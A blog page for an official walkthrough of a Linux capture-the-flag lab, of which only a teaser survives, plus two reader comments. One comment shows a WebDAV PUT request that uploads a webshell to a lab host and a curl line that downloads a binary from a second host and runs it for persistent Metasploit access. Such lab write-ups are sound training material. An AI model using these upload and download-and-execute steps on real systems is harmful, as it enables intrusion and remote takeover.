Blog Post

The Human Connection Blog
6 MIN READ

The Human Connection Challenge Lab 4: Linux Official Walkthrough Guide

StefanApostol's avatar
StefanApostol
Icon for Immerser rankImmerser
19 days ago
Time’s Up! Congratulations to everyone who completed Lab 4: Linux from the Human Connection Challenge: Season 1. In this walkthrough, I'll share some strategies for efficiently completing the lab b...
Updated 15 days ago
Version 2.0
challenges & scenarios
community challenge
StefanApostol's avatar
Icon for Immerser rankImmerser
Joined February 18, 2025
View Profile
Node avatar for The Human Connection Blog
The Human Connection Blog
Learn from our passionate experts on a wide range of subjects from Cyber Threat Research to maximizing value with Immersive, plus, hear from our outstanding customers who are keen to share their experiences.
Al13nz's avatar
Al13nz
Icon for Bronze II rankBronze II
2 days ago

Enjoyed the write up thanks! cURL is handy for target 3 too if you fancy an alternative method to metasploit 

  • steven's avatar
    steven
    Icon for Silver I rankSilver I
    12 hours ago

    yeah curl is a way too, didn't thought about this.
    I've done it manually and used burp:

    PUT /webdav/shell.php HTTP/1.1
Host: 10.102.63.213
....
Connection: close
Content-Length: 9463

<?php
... /insert your favorite webshell ....
?>

    and once the shell was working, use metasploit for perm access and further exploitation:

    curl http://10.102.20.4:8000/shell.bin -o shell.bin; chmod 755 shell.bin ; ./shell.bin